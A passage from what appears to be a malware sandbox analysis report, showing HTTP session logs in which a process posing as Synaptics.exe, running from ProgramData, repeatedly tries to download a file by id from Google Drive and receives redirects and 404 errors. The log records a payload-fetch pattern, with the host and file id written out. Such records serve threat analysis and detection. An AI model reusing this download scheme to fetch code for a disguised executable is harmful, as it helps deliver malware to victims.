                                                                                                                                                                    2024-12-30 03:59:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 6e 51 4e 5f 76 34 59 43 48 6d 4c 59 6c 56 64 79 6a 56 41 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="1nQN_v4YCHmLYlVdyjVAXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    113192.168.2.449912142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-KM_Bh2_Zvx7DhiGkXADR_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    114192.168.2.449913142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:40 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zCTv6LKvERgIL3Jafz1nuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    115192.168.2.449914142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7Zxc7tYAlHhm3Sl77wooeKkIH811kdZ9aOsB6hjMeCyxw-L5qs44kL-oQo3zyXE2cMx5lRBc4
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j_LKLvuLRj2wyuyAUeO4VA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:40 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:40 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 33 6b 4b 4b 77 43 54 7a 70 49 55 52 39 68 71 6d 6d 47 67 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="93kKKwCTzpIUR9hqmmGgxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:40 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    116192.168.2.449915142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:40 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC482Q6VrHTYGQ-osPbIpHMT_R9Ji_mfmQzjEyT4jKQEmC_X8p7dzHgHgDYhbPigdfGfTFvT4zs
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ow8qcLUkI1nnVjHb151auw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:40 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:40 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 69 68 57 4b 32 58 6e 6a 79 38 47 6b 78 39 46 47 33 42 61 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="7ihWK2Xnjy8Gkx9FG3BaWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:40 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    117192.168.2.449916142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-o55lWXv6dPVghJcuYeIkIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    118192.168.2.449917142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Zv3fG-Ql4o8jc2_FDMR4Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    119192.168.2.449918142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:41 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4kL-iL-oTdn4qTI2omROexovcwtBgGLqnkwBpQcc3WmZIPk8V1r52lVFeoCdfccpTD
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gVpoI4Tv-OnyM5LOkA2eFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:41 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
